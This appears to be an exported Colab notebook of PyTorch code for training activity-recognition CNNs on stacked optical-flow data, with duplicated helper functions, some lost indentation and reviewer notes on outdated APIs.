    ``log_value`` defined in other notebook cells.

    Returns ``(best_prec1, best_train_prec1, samples)``.
    """
    batch_time = AverageMeter()
    losses = AverageMeter()
    top1 = AverageMeter()
    samples = 0           # total examples consumed so far (logging x-axis)
    best_prec1 = 0        # best validation top-1 seen
    best_train_prec1 = 0  # best running train top-1 seen
    # switch to train mode
    model.train()
    end = time.time()
    for i, (input, target) in enumerate(train_loader):
        if scheduler is not None:
            scheduler.batch_step()
        target = target.cuda(non_blocking=True)
        input = input.cuda()
        # compute output
        output = model(input)
        loss = criterion(output, target)
        # measure accuracy and record loss
        prec1 = accuracy(output.data, target, topk=(1,))[0]
        losses.update(loss.item(), input.size(0))
        top1.update(float(prec1), input.size(0))
        samples += input.size(0)
        # compute gradient and do the optimizer step
        optimizer.zero_grad()
        loss.backward()
        optimizer.step()
        # measure elapsed time
        batch_time.update(time.time() - end)
        end = time.time()
        if i % args.print_freq == 0:
            print('Epoch: {0:.4f}\t'
                  'Step: {1}/{2}\t'
                  'Samples: [{samples}]\t'
                  'LR: {lr}\t'
                  'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
                  'Samples/s {samples_per_sec:.0f}\t'
                  'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
                  'Prec@1 {top1.val:.3f} ({top1.avg:.3f})'.format(
                      samples / len(train_dataset), i, len(train_loader), samples=samples, batch_time=batch_time,
                      samples_per_sec=input.size(0) / batch_time.avg,
                      lr=get_learning_rate(optimizer)[0],
                      loss=losses, top1=top1))
        if i % save_steps_freq == 0 and i > 0:
            # evaluate on validation set
            prec1 = validate(val_loader, model, criterion, samples, args)
            # remember best prec@1 and save checkpoint
            print('Checkpoint')
            is_best = prec1 > best_prec1
            best_prec1 = max(prec1, best_prec1)
            is_best_train = top1.avg > best_train_prec1
            best_train_prec1 = max(top1.avg, best_train_prec1)
            save_checkpoint({
                'samples': samples,
                'state_dict': model.state_dict(),
                'best_prec1': best_prec1,
                'best_train_prec1': best_train_prec1,
                'train_prec1': top1.avg,
            }, is_best, is_best_train,
                directory=checkpoint_directory)
            # log to TensorBoard
            log_value('train_loss', losses.avg, samples)
            log_value('train_acc', top1.avg, samples)
            log_value('learning_rate', get_learning_rate(optimizer)[0], samples)
            log_value('batch_size', input.size(0), samples)
            log_value('effective_batch_size', input.size(0) * args.accum, samples)
            log_value('accum', args.accum, samples)
            # restart the running meters for the next logging window
            batch_time.reset()
            losses.reset()
            top1.reset()
    return best_prec1, best_train_prec1, samples
def validate(val_loader, model, criterion, samples, args):
    """Run one evaluation pass; log against ``samples`` and return average top-1.

    ``samples`` is the cumulative training-sample count used as the
    TensorBoard x-axis; ``args`` supplies ``print_freq``.
    """
    batch_time = AverageMeter()
    losses = AverageMeter()
    top1 = AverageMeter()
    # switch to evaluate mode
    model.eval()
    end = time.time()
    # volatile Variables / ``async=True`` / ``loss.data[0]`` are pre-0.4
    # PyTorch idioms (``async`` is even a SyntaxError on Python >= 3.7);
    # replaced with torch.no_grad(), non_blocking=True and ``.item()``.
    with torch.no_grad():
        for i, (input, target) in enumerate(val_loader):
            target = target.cuda(non_blocking=True)
            input = input.cuda()
            # compute output
            output = model(input)
            loss = criterion(output, target)
            # measure accuracy and record loss
            prec1 = accuracy(output.data, target, topk=(1,))[0]
            losses.update(loss.item(), input.size(0))
            top1.update(float(prec1), input.size(0))
            # measure elapsed time
            batch_time.update(time.time() - end)
            end = time.time()
            if i % args.print_freq == 0:
                print('Test: [{0}/{1}]\t'
                      'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
                      'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
                      'Prec@1 {top1.val:.3f} ({top1.avg:.3f})'.format(
                          i, len(val_loader), batch_time=batch_time, loss=losses,
                          top1=top1))
    print(' * Prec@1 {top1.avg:.3f}'.format(top1=top1))
    # log to TensorBoard
    log_value('val_loss', losses.avg, samples)
    log_value('val_acc', top1.avg, samples)
    return top1.avg
def save_checkpoint(state, is_best, is_best_train, directory, filename='checkpoint.pth.tar'):
    """Save ``state`` in ``directory``; mirror best-validation / best-train copies.

    ``is_best`` duplicates the file to ``model_best.pth.tar``;
    ``is_best_train`` to ``model_best_train.pth.tar``.
    """
    os.makedirs(directory, exist_ok=True)  # race-free vs. exists()+makedirs()
    # join instead of ``directory + filename`` so a missing trailing slash
    # cannot silently glue the two names together
    path = os.path.join(directory, filename)
    torch.save(state, path)
    if is_best:
        shutil.copyfile(path, os.path.join(directory, 'model_best.pth.tar'))
    if is_best_train:
        shutil.copyfile(path, os.path.join(directory, 'model_best_train.pth.tar'))
class AverageMeter(object):
    """Running-average accumulator: last value, sum, count and mean."""

    def __init__(self):
        self.reset()

    def reset(self):
        """Start a fresh series."""
        self.val = 0
        self.sum = 0
        self.count = 0
        self.avg = 0

    def update(self, val, n=1):
        """Add ``n`` observations of ``val`` to the series."""
        self.val = val
        self.count = self.count + n
        self.sum = self.sum + val * n
        self.avg = self.sum / self.count
def adjust_learning_rate(optimizer, epoch, lr):
    """Decay the initial ``lr`` by 10x once past epoch 150 and again past 225."""
    decay = (0.1 ** (epoch // 150)) * (0.1 ** (epoch // 225))
    new_lr = lr * decay
    # log to TensorBoard
    log_value('learning_rate', new_lr, epoch)
    for group in optimizer.param_groups:
        group['lr'] = new_lr
def accuracy(output, target, topk=(1,)):
"""Computes the precision@k for the specified values of k"""
maxk = max(topk)
batch_size = target.size(0)
_, pred = output.topk(maxk, 1, True, True)
pred = pred.t()
correct = pred.eq(target.view(1, -1).expand_as(pred))
res = []
for k in topk:
correct_k = correct[:k].view(-1).float().sum(0)
res.append(correct_k.mul_(100.0 / batch_size))
return res
# + id="yRrnfaCf-YHe" colab_type="code" colab={}
train(model, train_loader, val_loader, optimizer, criterion, epochs=10) #, scheduler=scheduler)
# + id="5UnwWe7Q-YCs" colab_type="code" colab={}
# + id="Zw4cTEAI3RYv" colab_type="code" colab={}
def train(model, train, valid, optimizer, criterion, epochs=1, scheduler=None):
    """Classic epoch loop: fit on ``train``, report loss/accuracy on ``valid``.

    ``train``/``valid`` are DataLoaders whose ``dataset`` exposes a
    ``labels`` sequence (used only as the accuracy denominator -- TODO
    confirm against the dataset class).  Pre-0.4 idioms (``loss.data[0]``,
    volatile Variables), which raise on modern PyTorch, were replaced with
    ``.item()`` and ``torch.no_grad()``; the ``.cuda()`` move is hoisted
    out of the epoch loop (it is idempotent, so behavior is unchanged).
    """
    model = model.cuda()
    for epoch in range(epochs):
        print('Epoch ', epoch + 1, '/', epochs)
        running_loss = 0.
        running_corrects = 0.
        running_batches = 0.
        if scheduler:
            scheduler.step()
        model.train()
        for i, (input, target) in enumerate(train):
            input = input.cuda()
            target = target.cuda()
            optimizer.zero_grad()
            # compute output
            output = model(input)
            _, preds = torch.max(output.data, 1)
            loss = criterion(output, target)
            loss.backward()
            optimizer.step()
            running_loss += loss.item()
            running_corrects += torch.sum(preds == target).item()
            running_batches += 1.
            print('\r', 'Batch', i, 'Loss', loss.item(), end='')
        train_loss = running_loss / running_batches
        train_acc = running_corrects / len(train.dataset.labels)
        print('\r', "Train Loss", train_loss, "Train Accuracy", train_acc)
        running_loss = 0.
        running_corrects = 0.
        running_batches = 0.
        model.eval()
        with torch.no_grad():
            for i, (input, target) in enumerate(valid):
                input = input.cuda()
                target = target.cuda()
                output = model(input)
                _, preds = torch.max(output.data, 1)
                loss = criterion(output, target)
                running_loss += loss.item()
                running_corrects += torch.sum(preds == target).item()
                running_batches += 1.
        valid_loss = running_loss / running_batches
        valid_acc = running_corrects / len(valid.dataset.labels)
        print('\r', "Val Loss", valid_loss, "Val Accuracy", valid_acc)
# + id="y1Sgp2uI3CiB" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 17} outputId="b4b4fd6a-d9d9-4048-c0b1-259f937435f1"
import pickle,os
from PIL import Image
import scipy.io
import time
from tqdm import tqdm
import pandas as pd
import shutil
from random import randint
import numpy as np
from torch.utils.data import Dataset, DataLoader
import torchvision.transforms as transforms
import torchvision.models as models
import torch.nn as nn
import torch
import torch.backends.cudnn as cudnn
from torch.autograd import Variable
# other util
def accuracy(output, target, topk=(1,)):
"""Computes the precision@k for the specified values of k"""
maxk = max(topk)
batch_size = target.size(0)
_, pred = output.topk(maxk, 1, True, True)
pred = pred.t()
correct = pred.eq(target.view(1, -1).expand_as(pred))
res = []
for k in topk:
correct_k = correct[:k].view(-1).float().sum(0)
res.append(correct_k.mul_(100.0 / batch_size))
return res
class AverageMeter(object):
    """Accumulate a stream of values; expose last value and running mean."""

    def __init__(self):
        self.reset()

    def reset(self):
        """Forget everything seen so far."""
        for name in ('val', 'avg', 'sum', 'count'):
            setattr(self, name, 0)

    def update(self, val, n=1):
        """Register ``val``, counted ``n`` times."""
        self.val = val
        self.sum += val * n
        self.count += n
        self.avg = self.sum / self.count
def save_checkpoint(state, is_best, checkpoint, model_best):
    """Serialize ``state`` to ``checkpoint``; duplicate to ``model_best`` when best."""
    torch.save(state, checkpoint)
    if not is_best:
        return
    shutil.copyfile(checkpoint, model_best)
def record_info(info, filename, mode):
    """Print a progress summary for ``info`` and append it to ``filename``.

    ``mode`` selects the layout: 'train' rows carry data-time and LR
    columns, 'test' rows do not.  The CSV header is written only when the
    file does not exist yet.
    """
    if mode == 'train':
        print('Time {batch_time} '
              'Data {data_time} \n'
              'Loss {loss} '
              'Prec@1 {top1} '
              'Prec@5 {top5}\n'
              'LR {lr}\n'.format(batch_time=info['Batch Time'],
                                 data_time=info['Data Time'], loss=info['Loss'],
                                 top1=info['Prec@1'], top5=info['Prec@5'], lr=info['lr']))
        column_names = ['Epoch', 'Batch Time', 'Data Time', 'Loss', 'Prec@1', 'Prec@5', 'lr']
    if mode == 'test':
        print('Time {batch_time} \n'
              'Loss {loss} '
              'Prec@1 {top1} '
              'Prec@5 {top5} \n'.format(batch_time=info['Batch Time'], loss=info['Loss'],
                                        top1=info['Prec@1'], top5=info['Prec@5']))
        column_names = ['Epoch', 'Batch Time', 'Loss', 'Prec@1', 'Prec@5']
    df = pd.DataFrame.from_dict(info)
    if os.path.isfile(filename):
        # file already has a header -- append data rows only
        df.to_csv(filename, mode='a', header=False, index=False, columns=column_names)
    else:
        df.to_csv(filename, index=False, columns=column_names)
# + id="LEQVNzPm3RhS" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 37} outputId="cc9f142a-f012-40d3-c78c-be5d369cdbe7"
class Motion_CNN():
    """Trainer for the motion (optical-flow) stream of a two-stream action CNN.

    NOTE(review): written against pre-0.4 PyTorch -- ``Variable``,
    ``volatile=True``, ``loss.data[0]`` and ``.cuda(async=True)`` all fail
    on a modern stack (``async`` is a Python >= 3.7 keyword).  It also
    relies on globals from other notebook cells (``modelres``,
    ``ReduceLROnPlateau``, ``accuracy``, ``AverageMeter``,
    ``save_checkpoint``, ``record_info``), and ``self.test_video`` is never
    assigned (its line in ``__init__`` is commented out), so
    ``frame2_video_level_accuracy`` would raise AttributeError -- confirm
    before running.
    """
    def __init__(self, nb_epochs, lr, batch_size, resume, start_epoch, train_loader, test_loader, channel):
        # Store hyper-parameters and loaders verbatim; training state starts at 0.
        self.nb_epochs=nb_epochs
        self.lr=lr
        self.batch_size=batch_size
        self.resume=resume
        self.start_epoch=start_epoch
        #self.evaluate=evaluate
        self.train_loader=train_loader
        self.test_loader=test_loader
        self.best_prec1=0
        self.channel=channel
        #self.test_video=test_video
    def build_model(self):
        """Instantiate the network, loss, optimizer and LR scheduler."""
        print ('==> Build model and setup loss and optimizer')
        #build model -- ``modelres`` comes from another notebook cell; TODO confirm
        self.model = modelres.cuda()
        #print self.model
        #Loss function and optimizer
        self.criterion = nn.CrossEntropyLoss().cuda()
        self.optimizer = torch.optim.SGD(self.model.parameters(), self.lr, momentum=0.9)
        self.scheduler = ReduceLROnPlateau(self.optimizer, 'min', patience=1,verbose=True)
    def resume_and_evaluate(self):
        """Restore model/optimizer state from the ``self.resume`` checkpoint, if any."""
        if self.resume:
            if os.path.isfile(self.resume):
                print("==> loading checkpoint '{}'".format(self.resume))
                checkpoint = torch.load(self.resume)
                self.start_epoch = checkpoint['epoch']
                self.best_prec1 = checkpoint['best_prec1']
                self.model.load_state_dict(checkpoint['state_dict'])
                self.optimizer.load_state_dict(checkpoint['optimizer'])
                print("==> loaded checkpoint '{}' (epoch {}) (best_prec1 {})"
                  .format(self.resume, checkpoint['epoch'], self.best_prec1))
            else:
                print("==> no checkpoint found at '{}'".format(self.resume))
    def run(self):
        """Training driver: build, optionally resume, then train/validate per epoch."""
        self.build_model()
        self.resume_and_evaluate()
        cudnn.benchmark = True
        for self.epoch in range(self.start_epoch, self.nb_epochs):
            self.train_1epoch()
            prec1, val_loss = self.validate_1epoch()
            is_best = prec1 > self.best_prec1
            #lr_scheduler -- plateau scheduler keys off the validation loss
            self.scheduler.step(val_loss)
            # save model (video-level predictions are pickled on improvement)
            if is_best:
                self.best_prec1 = prec1
                with open('motion_video_preds.pickle','wb') as f:
                    pickle.dump(self.dic_video_level_preds,f)
                    f.close()
            save_checkpoint({
                'epoch': self.epoch,
                'state_dict': self.model.state_dict(),
                'best_prec1': self.best_prec1,
                'optimizer' : self.optimizer.state_dict()
            },is_best,'checkpoint.pth.tar','model_best.pth.tar')
    def train_1epoch(self):
        """One training epoch over ``self.train_loader``; logs to opf_train.csv."""
        print('==> Epoch:[{0}/{1}][training stage]'.format(self.epoch, self.nb_epochs))
        batch_time = AverageMeter()
        data_time = AverageMeter()
        losses = AverageMeter()
        top1 = AverageMeter()
        top5 = AverageMeter()
        #switch to train mode
        self.model.train()
        end = time.time()
        # mini-batch training
        progress = tqdm(self.train_loader)
        for i, (data,label) in enumerate(progress):
            # measure data loading time
            data_time.update(time.time() - end)
            label = label.cuda(async=True)
            input_var = Variable(data).cuda()
            target_var = Variable(label).cuda()
            # compute output
            output = self.model(input_var)
            loss = self.criterion(output, target_var)
            # measure accuracy and record loss
            prec1, prec5 = accuracy(output.data, label, topk=(1, 5))
            losses.update(loss.data[0], data.size(0))
            top1.update(prec1[0], data.size(0))
            top5.update(prec5[0], data.size(0))
            # compute gradient and do SGD step
            self.optimizer.zero_grad()
            loss.backward()
            self.optimizer.step()
            # measure elapsed time
            batch_time.update(time.time() - end)
            end = time.time()
        info = {'Epoch':[self.epoch],
                'Batch Time':[round(batch_time.avg,3)],
                'Data Time':[round(data_time.avg,3)],
                'Loss':[round(losses.avg,5)],
                'Prec@1':[round(top1.avg,4)],
                'Prec@5':[round(top5.avg,4)],
                'lr': self.optimizer.param_groups[0]['lr']
                }
        record_info(info, 'opf_train.csv','train')
    def validate_1epoch(self):
        """Evaluate on ``self.test_loader``, summing frame scores per video."""
        print('==> Epoch:[{0}/{1}][validation stage]'.format(self.epoch, self.nb_epochs))
        batch_time = AverageMeter()
        losses = AverageMeter()
        top1 = AverageMeter()
        top5 = AverageMeter()
        # switch to evaluate mode
        self.model.eval()
        self.dic_video_level_preds={}
        end = time.time()
        progress = tqdm(self.test_loader)
        for i, (keys,data,label) in enumerate(progress):
            #data = data.sub_(127.353346189).div_(14.971742063)
            label = label.cuda(async=True)
            data_var = Variable(data, volatile=True).cuda(async=True)
            label_var = Variable(label, volatile=True).cuda(async=True)
            # compute output
            output = self.model(data_var)
            # measure elapsed time
            batch_time.update(time.time() - end)
            end = time.time()
            #Calculate video level prediction by summing per-frame class scores
            preds = output.data.cpu().numpy()
            nb_data = preds.shape[0]
            for j in range(nb_data):
                videoName = keys[j] # ApplyMakeup_g01_c01
                if videoName not in self.dic_video_level_preds.keys():
                    self.dic_video_level_preds[videoName] = preds[j,:]
                else:
                    self.dic_video_level_preds[videoName] += preds[j,:]
        #Frame to video level accuracy
        video_top1, video_top5, video_loss = self.frame2_video_level_accuracy()
        info = {'Epoch':[self.epoch],
                'Batch Time':[round(batch_time.avg,3)],
                'Loss':[round(video_loss,5)],
                'Prec@1':[round(video_top1,3)],
                'Prec@5':[round(video_top5,3)]
                }
        record_info(info, 'opf_test.csv','test')
        return video_top1, video_loss
    def frame2_video_level_accuracy(self):
        """Compute video-level top-1/top-5/loss from the accumulated frame scores.

        The 101-wide score matrix suggests UCF101 -- TODO confirm.
        """
        correct = 0
        video_level_preds = np.zeros((len(self.dic_video_level_preds),101))
        video_level_labels = np.zeros(len(self.dic_video_level_preds))
        ii=0
        for key in sorted(self.dic_video_level_preds.keys()):
            name = key
            preds = self.dic_video_level_preds[name]
            # NOTE(review): self.test_video is never set (see __init__) -- this
            # line raises AttributeError as the class stands.
            label = int(self.test_video[name])-1
            video_level_preds[ii,:] = preds
            video_level_labels[ii] = label
            ii+=1
            if np.argmax(preds) == (label):
                correct+=1
        #top1 top5
        video_level_labels = torch.from_numpy(video_level_labels).long()
        video_level_preds = torch.from_numpy(video_level_preds).float()
        loss = self.criterion(Variable(video_level_preds).cuda(), Variable(video_level_labels).cuda())
        top1,top5 = accuracy(video_level_preds, video_level_labels, topk=(1,5))
        top1 = float(top1.numpy())
        top5 = float(top5.numpy())
        return top1,top5,loss.data.cpu().numpy()
# + id="nrCL5Plw3RdN" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 1285} outputId="99364e83-45ac-448c-b03f-bf0daf142e06"
model = Motion_CNN(
# Data Loader
train_loader=train_loader,
test_loader=val_loader,
# Utility
start_epoch=start_epoch,
resume=resume,
#evaluate=arg.evaluate,
# Hyper-parameter
nb_epochs=epochs,
lr=lr,
batch_size=batch_size,
channel = 10*2,
#test_video=test_video
)
#Training
model.run()
# + id="vHttek5s3RTU" colab_type="code" colab={}
# + id="W_y4bc8W3Can" colab_type="code" colab={}
# + id="JI-kGHPf3CVw" colab_type="code" colab={}
# + id="HdwJb6MX3COm" colab_type="code" colab={}
# + id="GBYr0s2c3CIO" colab_type="code" colab={}
# + id="RXzdhR3X3CDh" colab_type="code" colab={}
# + id="KXTI6eA83B-Y" colab_type="code" colab={}
# + id="lpEy24vb3B5h" colab_type="code" colab={}
# + id="jyTXSU8p3B0v" colab_type="code" colab={}
# + id="Wz-EyaN-3Bv8" colab_type="code" colab={}
# + id="KK2f3phK3BqU" colab_type="code" colab={}
# + id="r09Krxdfu4cv" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 102} outputId="4bf56ddb-a329-410a-c05d-d364fdefff88"
# + id="Tk2dufB79g-u" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 37} outputId="4ab16db5-25ac-4ef8-ab9a-a86538b9a365"
# + id="IpZXnYBVu4Ys" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 37} outputId="fb4aa4b2-b4d0-4261-a31e-c69bba98c491"
train_dataset = activityDataset('data', train_labels, transform)
train_loader = torch.utils.data.DataLoader(
train_dataset,
batch_size=batch_size//2,
shuffle=True
)
val_loader = torch.utils.data.DataLoader(
activityDataset('data', valid_labels, transform),
batch_size=batch_size//2,
shuffle=True
)
# + id="LjqrjQHbu4Oi" colab_type="code" colab={}
# + id="fm2x_71vu4Jl" colab_type="code" colab={}
# + id="KpLysXNjhdgG" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 17} outputId="b4af9d4f-32d2-4b3d-a901-a2ecace7d29b"
import pandas as pd
import numpy as np
train = pd.read_csv("train.csv",index_col = 0)
test = pd.read_csv("test.csv",index_col=0)
#print (train.shape)
#print (test.shape)
train.reset_index()
test.reset_index()
train.index = range(train.shape[0])
test.index = range(test.shape[0])
#print(train.shape[0])
target = train['label']
features = train.drop('label',axis=1)
X_data = features['id']
y_data = target
# + id="Qyfzw8EutvWt" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 1969} outputId="7b8cdbd3-7871-41e6-fbde-ae3a194ca5b6"
# + id="hRGsQmKahddo" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 37} outputId="faf3667a-866d-4686-f1c2-f839b7703a64"
# Per-sample geometry for the stacked optical-flow input: 216x216 spatial,
# 20 channels (presumably 10 frames x 2 flow directions -- TODO confirm),
# 7 activity classes.  NOTE(review): ``batch_size`` here is the *whole*
# dataset size, not a mini-batch.
dim = (216,216)
batch_size = X_data.shape[0]
n_classes = 7
n_channels = 20
shuffle = True
def data_generation(list_IDs_temp,labels):
    'Generates data containing batch_size samples' # X : (n_samples, *dim, n_channels)
    # Initialization
    X = np.empty((batch_size, *dim, n_channels))
    y = np.empty((batch_size), dtype=int)
    # Generate data
    for i, ID in enumerate(list_IDs_temp):
        #print(i,ID)
        # Store sample: each ID is a filename under data/ loadable by np.load
        X[i,] = np.load('data/' + ID )
        # Store class -- positional lookup; assumes ``labels`` was re-indexed 0..n-1
        y[i] = labels[i]
    # NOTE(review): ``keras`` is never imported in this (PyTorch) notebook
    # chunk; this call raises NameError unless another cell imports it.
    return X , keras.utils.to_categorical(y, num_classes=n_classes)
# + id="lZEYEHRuhdab" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 37} outputId="a27530c4-3dfa-4843-c308-407e1b9178fa"
# Datasets
partition = X_data
labels = y_data
#keras.utils.to_categorical(y, num_classes=n_classes)
# Generators
xData,yData = data_generation(partition,labels)
# + id="cbnKiQmchdVw" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 71} outputId="d7878b23-a6b4-4a84-e965-7dc32e4c03bd"
# NOTE(review): ``sklearn.cross_validation`` was removed in scikit-learn 0.20;
# modern code imports train_test_split from ``sklearn.model_selection``.
from sklearn.cross_validation import train_test_split
random_seed = 2
# Data and labels are split in two separate calls; the identical
# ``random_state`` produces the same shuffle only because both inputs have
# the same length -- passing both arrays to one call would be safer.
trainData, testData = train_test_split(xData, test_size=0.2,random_state=random_seed)
trainLabels, testLabels = train_test_split(labels, test_size=0.2,random_state=random_seed)
# + id="Kq65l_JDHXrl" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 37} outputId="82cf1ddd-5a47-4ebf-992b-b02cfb32e7f6"
import numpy
images_batch = torch.from_numpy(trainData).float()
#images_batch = torch.from_numpy(numpy.array(trainData))
#images_batch = torch.stack([torch.Tensor(i) for i in trainData])
labels_batch = torch.from_numpy(numpy.array(trainLabels))
# + id="B3TjlOrAJmCi" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 37} outputId="6aa227e3-6502-4e03-850e-904c7e0be5f5"
images_batch_val = torch.from_numpy(testData).float()
#images_batch_val = torch.from_numpy(numpy.array(testData))
#images_batch_val = torch.stack([torch.Tensor(i) for i in testData])
labels_batch_val = torch.from_numpy(numpy.array(testLabels))
# + id="VCvCmNT2suH3" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 163} outputId="7fd50b2d-8d24-43b3-df56-3c7f087fc0d8"
train_dataset
# + id="bAkCeKvpJSzK" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 37} outputId="001b60b3-727d-45a7-db07-e7fe280e9f5f"
train_dataset = images_batch,trainLabels
train_loader = torch.utils.data.DataLoader(
train_dataset,
batch_size=batch_size,
shuffle=True
)
val_dataset = images_batch_val , testLabels
val_loader = torch.utils.data.DataLoader(
val_dataset,
batch_size=batch_size,
shuffle=True
)
# + id="434T32iAM3gC" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 37} outputId="85e51a4e-a580-45c9-b3ae-8a3a55ef1643"
criterion = nn.CrossEntropyLoss().cuda()
optimizer = torch.optim.Adam(model.parameters(), lr=lr)
# + id="US4WfaxsXlvA" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 656} outputId="c2002a33-317d-4aa5-a32d-2c3a54ce668c"
loader = iter(train_loader)
next(loader)
# + id="Qklftlp7F6WX" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 37} outputId="4722a531-5cac-4fc9-a7ac-745e0dc435f2"
model = model.cuda()
# + id="aXpsS8RWP7NB" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 911} outputId="77f43219-9581-483c-b57d-5cde7d05e2dd"
train(model, train_loader, val_loader, optimizer, criterion, epochs=5) #, scheduler=scheduler)
# + id="G7jwzCsT2Ice" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 37} outputId="64f4d76f-ed08-4259-d08c-6716f7d83a4e"
def train(model, train, valid, optimizer, criterion, epochs=1, scheduler=None):
    """Epoch loop: fit on ``train``, then report loss/accuracy on ``valid``.

    ``train``/``valid`` are DataLoaders whose ``dataset`` exposes a
    ``labels`` sequence (accuracy denominator -- TODO confirm).  Pre-0.4
    idioms (``loss.data[0]``, volatile Variables), which raise on modern
    PyTorch, were replaced with ``.item()`` and ``torch.no_grad()``.
    The model is assumed to be on the GPU already (inputs are moved per
    batch, matching the original).
    """
    for epoch in range(epochs):
        print('Epoch ', epoch + 1, '/', epochs)
        running_loss = 0.
        running_corrects = 0.
        running_batches = 0.
        if scheduler:
            scheduler.step()
        model.train()
        for i, (input, target) in enumerate(train):
            input = input.cuda()
            target = target.cuda()
            optimizer.zero_grad()
            # compute output
            output = model(input)
            _, preds = torch.max(output.data, 1)
            loss = criterion(output, target)
            loss.backward()
            optimizer.step()
            running_loss += loss.item()
            running_corrects += torch.sum(preds == target).item()
            running_batches += 1.
            print('\r', 'Batch', i, 'Loss', loss.item(), end='')
        train_loss = running_loss / running_batches
        train_acc = running_corrects / len(train.dataset.labels)
        print('\r', "Train Loss", train_loss, "Train Accuracy", train_acc)
        running_loss = 0.
        running_corrects = 0.
        running_batches = 0.
        model.eval()
        with torch.no_grad():
            for i, (input, target) in enumerate(valid):
                input = input.cuda()
                target = target.cuda()
                output = model(input)
                _, preds = torch.max(output.data, 1)
                loss = criterion(output, target)
                running_loss += loss.item()
                running_corrects += torch.sum(preds == target).item()
                running_batches += 1.
        valid_loss = running_loss / running_batches
        valid_acc = running_corrects / len(valid.dataset.labels)
        print('\r', "Val Loss", valid_loss, "Val Accuracy", valid_acc)
# + id="CdfhcVyb2cHg" colab_type="code" colab={}
# + id="vMW9_cJP2EKU" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 350} outputId="0f646ac8-6bdb-4e42-8c06-5ac351a0962a"
#model = models.resnet34(pretrained= True, channel=10*2).cuda()
for param in model.parameters():
param.requires_grad = False
num_ftrs = model.classifier.in_features
model.classifier = nn.Linear(num_ftrs, num_classes)
model = model.cuda()
criterion = nn.CrossEntropyLoss().cuda()
optimizer = torch.optim.Adam(model.classifier.parameters()) #torch.optim.SGD(model.classifier.parameters(), lr=0.001, momentum=0.9)
#scheduler = lr_scheduler.StepLR(optimizer, step_size=7, gamma=0.1)
# + id="TxqKx1h-2EGz" colab_type="code" colab={}
train(model, train_loader, val_loader, optimizer, criterion, epochs=5) #, scheduler=scheduler)
# + id="lm7y3Uz32ECY" colab_type="code" colab={}
# + id="HieoF4-hqXlN" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 775} outputId="4d73e1e2-ad87-46c9-8a43-28d2f9563c65"
loader = iter(train_loader)
next(loader)
# + id="tDCcNL17PdDc" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 37} outputId="a442da9e-544d-4f7c-a058-0e8feb3858d7"
import os
# + id="ZJD4cTbEawnQ" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 37} outputId="a02ea983-08cb-463b-83f0-5190a2e0d8d2"
import pickle,os
from PIL import Image
import scipy.io
import time
from tqdm import tqdm
import pandas as pd
import shutil
from random import randint
import numpy as np
from torch.utils.data import Dataset, DataLoader
import torchvision.transforms as transforms
import torchvision.models as models
import torch.nn as nn
import torch
import torch.backends.cudnn as cudnn
from torch.autograd import Variable
# other util
def accuracy(output, target, topk=(1,)):
"""Computes the precision@k for the specified values of k"""
maxk = max(topk)
batch_size = target.size(0)
_, pred = output.topk(maxk, 1, True, True)
pred = pred.t()
correct = pred.eq(target.view(1, -1).expand_as(pred))
res = []
for k in topk:
correct_k = correct[:k].view(-1).float().sum(0)
res.append(correct_k.mul_(100.0 / batch_size))
return res
class AverageMeter(object):
    """Track the latest value of a metric alongside its running average."""

    def __init__(self):
        self.reset()

    def reset(self):
        """Discard all recorded observations."""
        self.val = 0
        self.avg = 0
        self.sum = 0
        self.count = 0

    def update(self, val, n=1):
        """Record ``val`` weighted by ``n`` and recompute the average."""
        self.val = val
        total = self.sum + val * n
        seen = self.count + n
        self.sum, self.count = total, seen
        self.avg = total / seen
def save_checkpoint(state, is_best, checkpoint, model_best):
    """Write ``state`` to ``checkpoint``; copy to ``model_best`` on improvement."""
    torch.save(state, checkpoint)
    if is_best:
        shutil.copyfile(checkpoint, model_best)
def record_info(info, filename, mode):
    """Echo a formatted summary of ``info`` and append one row to ``filename``.

    'train' mode includes data-loading time and LR columns; 'test' mode is
    the shorter layout.  A header row is only emitted for a new file.
    """
    if mode == 'train':
        column_names = ['Epoch', 'Batch Time', 'Data Time', 'Loss', 'Prec@1', 'Prec@5', 'lr']
        print('Time {batch_time} '
              'Data {data_time} \n'
              'Loss {loss} '
              'Prec@1 {top1} '
              'Prec@5 {top5}\n'
              'LR {lr}\n'.format(batch_time=info['Batch Time'],
                                 data_time=info['Data Time'], loss=info['Loss'],
                                 top1=info['Prec@1'], top5=info['Prec@5'], lr=info['lr']))
    if mode == 'test':
        column_names = ['Epoch', 'Batch Time', 'Loss', 'Prec@1', 'Prec@5']
        print('Time {batch_time} \n'
              'Loss {loss} '
              'Prec@1 {top1} '
              'Prec@5 {top5} \n'.format(batch_time=info['Batch Time'], loss=info['Loss'],
                                        top1=info['Prec@1'], top5=info['Prec@5']))
    frame = pd.DataFrame.from_dict(info)
    if not os.path.isfile(filename):
        frame.to_csv(filename, index=False, columns=column_names)
    else:
        # existing file: append rows without repeating the header
        frame.to_csv(filename, mode='a', header=False, index=False, columns=column_names)
